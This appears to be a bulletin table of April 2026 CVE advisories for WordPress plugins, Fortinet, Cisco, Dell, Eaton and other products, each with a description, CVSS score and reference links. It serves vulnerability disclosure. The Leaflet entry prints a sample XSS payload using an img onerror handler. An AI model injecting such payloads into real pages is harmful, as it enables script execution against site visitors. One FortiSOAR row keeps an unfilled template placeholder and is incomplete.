| flippercode--WP Maps Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters | The WP Maps - Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'put_wpgm' shortcode in all versions up to, and including, 4.8.7. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-16 | 6.4 | CVE-2025-13364 | https://www.wordfence.com/threat-intel/vulnerabilities/id/91d6cf21-cb65-40cb-ad19-5a8e7179fd98?source=cve https://plugins.trac.wordpress.org/changeset?old_path=wp-google-map-plugin/tags/4.8.7/wp-google-map-plugin.php&new_path=wp-google-map-plugin/tags/4.8.8/wp-google-map-plugin.php |
| DesigningMedia--Eleganzo | The Eleganzo theme for WordPress is vulnerable to arbitrary directory deletion due to insufficient path validation in the akd_required_plugin_callback function in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary directories on the server, including the WordPress root directory. | 2026-04-14 | 6.5 | CVE-2025-15470 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7c5d7818-e548-4d8f-b847-396d528b58cd?source=cve https://testwp.local/wp-content/themes/eleganzo/welcome.php#L96 |
| Emarket-design--YouTube Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Emarket-design YouTube Showcase allows Stored XSS.This issue affects YouTube Showcase: from n/a through 3.5.1. | 2026-04-15 | 6.5 | CVE-2025-15636 | https://patchstack.com/database/wordpress/plugin/youtube-showcase/vulnerability/wordpress-youtube-showcase-plugin-3-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| HCLSoftware--Velocity | Rate Limiting for attempting a user login is not being properly enforced, making HCL DevOps Velocity susceptible to brute-force attacks past the unsuccessful login attempt limit. This vulnerability is fixed in 5.1.7. | 2026-04-13 | 6.8 | CVE-2025-31991 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130138 |
| ABB--AC800M (System 800xA) | A vulnerability exists in the command handling of the IEC 61850 communication stack included in the product revisions listed as affected in this CVE. An attacker with access to IEC 61850 networks could exploit the vulnera bility by using a specially crafted 61850 packet, forcing the communication interfaces of the PM 877, CI850 and CI868 modules into fault mode or causing unavailability of the S+ Operations 61850 connectivity, resulting in a denial-of-service situation. The System 800xA IEC61850 Connect is not affected. Note: This vulnerability does not impact on the overall availability and functionality of the S+ Operations node, only the 61850 communication function. This issue affects AC800M (System 800xA): from 6.0.0x through 6.0.0303.0, from 6.1.0x through 6.1.0031.0, from 6.1.1x through 6.1.1004.0, from 6.1.1x through 6.1.1202.0, from 6.2.0x through 6.2.0006.0; Symphony Plus SD Series: A_0, A_1, A_2.003, A_3.005, A_4.001, B_0.005; Symphony Plus MR (Melody Rack): from 3.10 through 3.52; S+ Operations: 2.1, 2.2, 2.3, 3.3. | 2026-04-13 | 6.5 | CVE-2025-3756 | https://search.abb.com/library/Download.aspx?DocumentID=7PAA020125&LanguageCode=en&DocumentPartId=&Action=Launch |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an insertion of sensitive information into log file vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account. | 2026-04-16 | 6.6 | CVE-2025-43937 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain a session fixation vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.2 | CVE-2025-46605 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper restriction of excessive authentication attempts vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.2 | CVE-2025-46606 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper authentication vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.6 | CVE-2025-46607 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 8.4 through 8.5 contain an improper authentication vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-17 | 6.6 | CVE-2025-46641 | https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Fortinet--FortiOS | A missing authentication for critical function vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4 all versions, FortiOS 6.2.9 through 6.2.17 allows attacker to execute unauthorized code or commands via specially crafted packets. | 2026-04-14 | 6.2 | CVE-2025-53847 | https://fortiguard.fortinet.com/psirt/FG-IR-26-125 |
| WSO2--WSO2 API Manager | The authentication endpoint fails to encode user-supplied input before rendering it in the web page, allowing for script injection. An attacker can leverage this by injecting malicious scripts into the authentication endpoint. This can result in the user's browser being redirected to a malicious website, manipulation of the web page's user interface, or the retrieval of information from the browser. However, session hijacking is not possible due to the httpOnly flag protecting session-related cookies. | 2026-04-16 | 6.1 | CVE-2025-6024 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4251/ |
| Fortinet--FortiManager | An improper neutralization of special elements used in an sql command ('sql injection') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.8, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.8, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.8, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.8, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged authenticated attacker to execute unauthorized code or commands via JSON RPC API | 2026-04-14 | 6.8 | CVE-2025-61848 | https://fortiguard.fortinet.com/psirt/FG-IR-26-111 |
| leaflet[.]com--Leaflet 1.9.4 | Leaflet versions up to and including 1.9.4 are vulnerable to Cross-Site Scripting (XSS) via the bindPopup() method. This method renders user-supplied input as raw HTML without sanitization, allowing attackers to inject arbitrary JavaScript code through event handler attributes (e.g., <img src=x onerror="alert('XSS')">). When a victim views an affected map popup, the malicious script executes in the context of the victim's browser session. | 2026-04-14 | 6.1 | CVE-2025-69993 | http://leaflet.com https://github.com/PierfrancescoConti/leaflet-cve-2025-69993/blob/main/ADVISORY.md |
| Microsoft--Windows 10 Version 1607 | Reliance on untrusted inputs in a security decision in Windows Boot Loader allows an authorized attacker to bypass a security feature locally. | 2026-04-14 | 6.7 | CVE-2026-0390 | UEFI Secure Boot Security Feature Bypass Vulnerability |
| SAP_SE--SAP Supplier Relationship Management (SICF Handler in SRM Catalog) | Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected. | 2026-04-14 | 6.1 | CVE-2026-0512 | https://me.sap.com/notes/3645228 https://url.sap/sapsecuritypatchday |
| turn2honey--EMC Easily Embed Calendly Scheduling | The EMC - Easily Embed Calendly Scheduling Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's calendly shortcode in all versions up to, and including, 4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-19 | 6.4 | CVE-2026-0868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5653ebe-7145-4b1c-94f8-ca87ed0dc4f5?source=cve https://plugins.trac.wordpress.org/changeset/3466576/embed-calendly-scheduling |
| vanderwijk--Content Blocks (Custom Post Widget) | The Content Blocks (Custom Post Widget) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's content_block shortcode in all versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping on user supplied values consumed from user-created content blocks. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-18 | 6.4 | CVE-2026-0894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/246dee15-82e0-4630-8d95-d2419e9eaef8?source=cve https://plugins.trac.wordpress.org/changeset/3447914/custom-post-widget |
| youzify--Youzify BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress | The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-18 | 6.4 | CVE-2026-1559 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6bd69711-8303-4086-87c3-eb2935a89aff?source=cve https://plugins.trac.wordpress.org/browser/youzify/trunk/includes/public/core/wall/class-youzify-form.php#L506 https://plugins.trac.wordpress.org/browser/youzify/tags/1.3.6/includes/public/core/wall/class-youzify-form.php#L506 https://plugins.trac.wordpress.org/browser/youzify/trunk/includes/public/core/class-youzify-wall.php#L109 https://plugins.trac.wordpress.org/browser/youzify/tags/1.3.6/includes/public/core/class-youzify-wall.php#L109 https://plugins.trac.wordpress.org/changeset/3483281/youzify/trunk/includes/public/core/wall/class-youzify-form.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fyouzify/tags/1.3.6&new_path=%2Fyouzify/tags/1.3.7 |
| livemesh--Livemesh Addons by Elementor | The Livemesh Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 9.0. This is due to missing authorization checks on the AJAX handler `lae_admin_ajax()` and insufficient output escaping on multiple checkbox settings fields. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in the plugin settings page that will execute whenever an administrator accesses the plugin settings page granted they can obtain a valid nonce, which can be leaked via the plugin's improper access control on settings pages. | 2026-04-16 | 6.4 | CVE-2026-1572 | https://www.wordfence.com/threat-intel/vulnerabilities/id/24b9bf5a-19ac-4e99-b32d-1ab681356a1b?source=cve https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/admin-ajax.php#L28 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/admin-ajax.php#L64 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/admin-ajax.php#L64 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/admin-ajax.php#L28 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/plugin.php#L207 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/plugin.php#L207 https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/admin/views/settings.php#L707 https://plugins.trac.wordpress.org/browser/addons-for-elementor/tags/9.0/admin/views/settings.php#L707 |
| surbma--Surbma | Booking.com Shortcode | The Surbma | Booking.com Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `surbma-bookingcom` shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-04-14 | 6.4 | CVE-2026-1607 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01280afb-4745-4f36-823e-ed794bb3353a?source=cve https://plugins.trac.wordpress.org/browser/surbma-bookingcom-shortcode/tags/2.0/surbma-bookingcom-shortcode.php#L34 |
| Lenovo--Service Bridge | A potential DLL hijacking vulnerability was reported in Lenovo Service Bridge that, under certain conditions, could allow a local authenticated user to execute code with elevated privileges. | 2026-04-15 | 6.7 | CVE-2026-1636 | https://support.lenovo.com/us/en/product_security/LEN-211071 |
| prasunsen--Hostel | The Hostel plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcode_id' parameter in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-04-18 | 6.1 | CVE-2026-1838 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9da491-771a-4100-b41a-7411981dd34b?source=cve https://plugins.trac.wordpress.org/browser/hostel/trunk/hostel.php#L44 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/hostel.php#L44 https://plugins.trac.wordpress.org/browser/hostel/trunk/controllers/ajax.php#L28 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/controllers/ajax.php#L28 https://plugins.trac.wordpress.org/browser/hostel/trunk/views/partial/rooms-table.html.php#L29 https://plugins.trac.wordpress.org/browser/hostel/tags/1.1.6/views/partial/rooms-table.html.php#L29 https://plugins.trac.wordpress.org/changeset/3478265/hostel/trunk/hostel.php https://plugins.trac.wordpress.org/changeset?old_path=%2Fhostel/tags/1.1.6&new_path=%2Fhostel/tags/1.1.7 |
| woobeewoo--Product Pricing Table by WooBeWoo | The Product Pricing Table by WooBeWoo plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing or incorrect nonce validation on the updateLabel() and remove() functions. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages or delete pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-04-15 | 6.1 | CVE-2026-1852 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a3b459e0-4bd9-443e-96e4-91663a35c26e?source=cve https://github.com/wpcodefactory/woo-product-pricing-tables/releases/tag/v1.1.1 |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a reflected XSS attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. | 2026-04-15 | 6.1 | CVE-2026-20059 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Unity Connection | Multiple vulnerabilities in Cisco Unity Connection could allow an authenticated, remote attacker to download arbitrary files from an affected system. To exploit these vulnerabilities, the attacker must have valid administrative credentials. These vulnerabilities are due to improper sanitization of user input to the web-based management interface. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from an affected system. | 2026-04-15 | 6.5 | CVE-2026-20078 | cisco-sa-unity-file-download-RmKEVWPx |
| Cisco--Cisco Unity Connection | Multiple vulnerabilities in Cisco Unity Connection could allow an authenticated, remote attacker to download arbitrary files from an affected system. To exploit these vulnerabilities, the attacker must have valid administrative credentials. These vulnerabilities are due to improper sanitization of user input to the web-based management interface. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request. A successful exploit could allow the attacker to download arbitrary files from an affected system. | 2026-04-15 | 6.5 | CVE-2026-20081 | cisco-sa-unity-file-download-RmKEVWPx |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the CLI of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, local attacker with administrative privileges to perform a command injection attack on the underlying operating system and elevate privileges to root. This vulnerability is due to insufficient validation of user supplied input. An attacker could exploit this vulnerability by providing crafted input to a specific CLI command. A successful exploit could allow the attacker to elevate their privileges to root on the underlying operating system. | 2026-04-15 | 6 | CVE-2026-20136 | cisco-sa-ise-cmd-inj-5WSJcYJB |
| Cisco--Cisco Webex Contact Center | A vulnerability in the Desktop Agent functionality of Cisco Webex Contact Center could have allowed an unauthenticated, remote attacker to conduct cross-site scripting attacks. Cisco has addressed this vulnerability in the Cisco Webex Contact Center service, and no customer action is needed. This vulnerability existed because HTML and script content was not properly handled. Prior to this vulnerability being addressed, an attacker could have exploited this vulnerability by persuading a user to follow a malicious link. A successful exploit could have allowed the attacker to steal sensitive information from the browser, including authentication and session information. | 2026-04-15 | 6.1 | CVE-2026-20170 | cisco-sa-webexcc-xss-WEX5nUnA |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.6, 10.2.2510.10, 10.1.2507.20, 10.0.2503.13, and 9.3.2411.127, a user who holds a role that contains the high-privilege capability `edit_user`could create a specially crafted username that includes a null byte or a non-UTF-8 percent-encoded byte due to improper input validation.<br><br>This could lead to inconsistent conversion of usernames into a proper format for storage and account management inconsistencies, such as being unable to edit or delete affected users. | 2026-04-15 | 6.6 | CVE-2026-20202 | https://advisory.splunk.com/advisories/SVD-2026-0401 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in Retail Mode prior to SMR Apr-2026 Release 1 allows local attackers to trigger privileged functions. | 2026-04-13 | 6.6 | CVE-2026-21010 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Adobe--Adobe Connect | Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed. | 2026-04-14 | 6.1 | CVE-2026-21331 | https://helpx.adobe.com/security/products/connect/apsb26-37.html |
| Fortinet--FortiSOAR on-premise | A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to information disclosure via <insert attack vector here> | 2026-04-14 | 6.2 | CVE-2026-22155 | https://fortiguard.fortinet.com/psirt/FG-IR-26-106 |
| Fortinet--FortiSOAR on-premise | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5 all versions, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5 all versions, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform path traversal attack via File Content Extraction actions. | 2026-04-14 | 6.2 | CVE-2026-22573 | https://fortiguard.fortinet.com/psirt/FG-IR-26-116 |
| Eaton--IPP Software | Due to improper input validation in one of the Eaton Intelligent Power Protector (IPP) XML, it is possible for an attacker with admin privileges and access to the local system to inject malicious code resulting in arbitrary command execution. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 6 | CVE-2026-22615 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Eaton--IPP Software | Eaton Intelligent Power Protector (IPP) software allows repeated authentication attempts against the web interface login page due to insufficient rate‑limiting controls. This security issue has been fixed in the latest version of Eaton IPP which is available on the Eaton download centre. | 2026-04-16 | 6.5 | CVE-2026-22616 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Fortinet--FortiVoice | An exposure of sensitive information to an unauthorized actor vulnerability in Fortinet FortiNDR 7.6.0, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiVoice 7.0.0 through 7.0.1 may allow a remote authenticated attacker with at least read-only permission on system maintenance to access backup information via crafted HTTP requests | 2026-04-14 | 5.4 | CVE-2024-23104 | https://fortiguard.fortinet.com/psirt/FG-IR-26-124 |
| WSO2--WSO2 API Manager | The WSO2 API Manager developer portal accepts user-supplied input without enforcing expected validation constraints or proper output encoding. This deficiency allows a malicious actor to inject script content that is executed within the context of a user's browser. By leveraging this cross-site scripting vulnerability, a malicious actor can cause the browser to redirect to a malicious website, make changes to the UI of the web page, or retrieve information from the browser. However, session hijacking is not possible as all session-related sensitive cookies are protected by the httpOnly flag. | 2026-04-16 | 5.4 | CVE-2024-4867 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3391/ |
| cartasi--Nexi XPay | The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed. | 2026-04-14 | 5.3 | CVE-2025-15565 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268 |
| Dell--Dell Pro 14 Essential PV14250 | Dell Client Platform BIOS contains a Weak Password Recovery Mechanism vulnerability. An unauthenticated attacker with physical access to the system could potentially exploit this vulnerability, leading to unauthorized access. | 2026-04-16 | 5.1 | CVE-2025-36579 | https://www.dell.com/support/kbdoc/en-us/000300450/dsa-2025-153 |
| Fortinet--FortiOS | An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands. | 2026-04-14 | 5.4 | CVE-2025-61624 | https://fortiguard.fortinet.com/psirt/FG-IR-26-122 |
| Fortinet--FortiManager Cloud | An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.4, FortiAnalyzer 7.4.0 through 7.4.7, FortiAnalyzer 7.2 all versions, FortiAnalyzer 7.0 all versions, FortiAnalyzer Cloud 7.6.0 through 7.6.4, FortiAnalyzer Cloud 7.4.0 through 7.4.7, FortiAnalyzer Cloud 7.2 all versions, FortiAnalyzer Cloud 7.0 all versions, FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.7, FortiManager 7.2 all versions, FortiManager 7.0 all versions, FortiManager Cloud 7.6.0 through 7.6.4, FortiManager Cloud 7.4.0 through 7.4.7, FortiManager Cloud 7.2 all versions, FortiManager Cloud 7.0 all versions may allow a privileged attacker to delete files from the underlying filesystem via crafted CLI requests. | 2026-04-14 | 5.4 | CVE-2025-68649 | https://fortiguard.fortinet.com/psirt/FG-IR-26-120 |
| wpxpo--Post Grid Gutenberg Blocks for News, Magazines, Blog Websites PostX | The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites - PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ultp_shareCount_callback() function in all versions up to, and including, 5.0.5. This makes it possible for unauthenticated attackers to modify the share_count post meta for any post, including private or draft posts. | 2026-04-16 | 5.3 | CVE-2026-0718 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c4b2cf3b-5d35-4ce6-9453-1538a6f7752f?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/ultimate-post/tags/5.0.5/classes/Blocks.php&new_path=/ultimate-post/tags/5.0.6/classes/Blocks.php |
| iberezansky--3D FlipBook PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery | The 3D FlipBook - PDF Embedder, PDF Flipbook Viewer, Flipbook Image Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the send_post_pages_json() function in all versions up to, and including, 1.16.17. This makes it possible for unauthenticated attackers to retrieve flipbook page metadata for draft, private and password-protected flipbooks. | 2026-04-14 | 5.3 | CVE-2026-1314 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7e41753-2dbf-4afa-b61e-e617be2c4dc2?source=cve https://plugins.trac.wordpress.org/changeset/3467608/ |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin's `output_action_hook()` function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation. | 2026-04-15 | 5.4 | CVE-2026-1509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fdc57b06-bae9-49a3-84dd-f593705330e9?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 https://avada.com/documentation/avada-changelog/ |
| Wpmet--MetForm Pro | The MetForm Pro plugin for WordPress is vulnerable to Improper Input Validation in all versions up to, and including, 3.9.7 This is due to the payment integrations (Stripe/PayPal) trusting a user-submitted calculation field value without recomputing or validating it against the configured form price. This makes it possible for unauthenticated attackers to manipulate the payment amount via the 'mf-calculation' field in the form submission REST request granted there exists a specific form with this particular configuration. | 2026-04-15 | 5.3 | CVE-2026-1782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a49dd64b-6ae8-49ed-9e8a-e5b73c2acf4b?source=cve https://wpmet.com/plugin/metform/ |
| Cisco--Cisco Secure Web Appliance | A vulnerability in the authentication service feature of Cisco AsyncOS Software for Cisco Secure Web Appliance could allow an unauthenticated, remote attacker to bypass authentication policy requirements. This vulnerability is due to improper validation of user-supplied authentication input in HTTP requests. An attacker could exploit this vulnerability by sending HTTP requests that contain specific authentication requests to an affected device. A successful exploit could allow the attacker to bypass policy enforcement on the device. There is no direct impact to the Cisco Secure Web Appliance. However, as a result of exploiting this vulnerability, an attacker could send HTTP requests that should be restricted through the device. | 2026-04-15 | 5.3 | CVE-2026-20152 | cisco-sa-wsa-auth-bypass-6YZkTQhd |
| Cisco--Cisco ThousandEyes Enterprise Agent | A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent could allow an authenticated, local attacker with low privileges to overwrite arbitrary files on the local system of an affected device. This vulnerability is due to improper access controls on files that are on the local file system of an affected device. An attacker could exploit this vulnerability by placing a symbolic link in a specific location on the local file system. A successful exploit could allow the attacker to bypass file system permissions and overwrite arbitrary files on the affected device. | 2026-04-15 | 5.5 | CVE-2026-20161 | cisco-sa-te-agentfilewrite-tqUw3SMU |
| Microsoft--Windows 10 Version 1809 | Access of resource using incompatible type ('type confusion') in Windows COM allows an authorized attacker to disclose information locally. | 2026-04-14 | 5.5 | CVE-2026-20806 | Windows COM Server Information Disclosure Vulnerability |
| Grafana--Loki | The CVE-2021-36156 fix validates the namespace parameter for path traversal sequences after a single URL decode, by double encoding, an attacker can read files at the Ruler API endpoint /loki/api/v1/rules/{namespace} Thanks to Prasanth Sundararajan for reporting this vulnerability. | 2026-04-15 | 5.3 | CVE-2026-21726 | https://grafana.com/security/security-advisories/cve-2026-21726 |
| Fortinet--FortiSOAR PaaS | A cleartext transmission of sensitive information vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.1, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to view cleartext password in response for Secure Message Exchange and Radius queries, if configured | 2026-04-14 | 5.4 | CVE-2026-21742 | https://fortiguard.fortinet.com/psirt/FG-IR-26-106 |
| Eaton--IPP Software | Eaton Intelligent Power Protector (IPP) uses an insecure cookie configuration, which could allow a network‑based attacker to intercept the cookie and exploit it through a man‑in‑the‑middle attack. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 5.7 | CVE-2026-22617 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
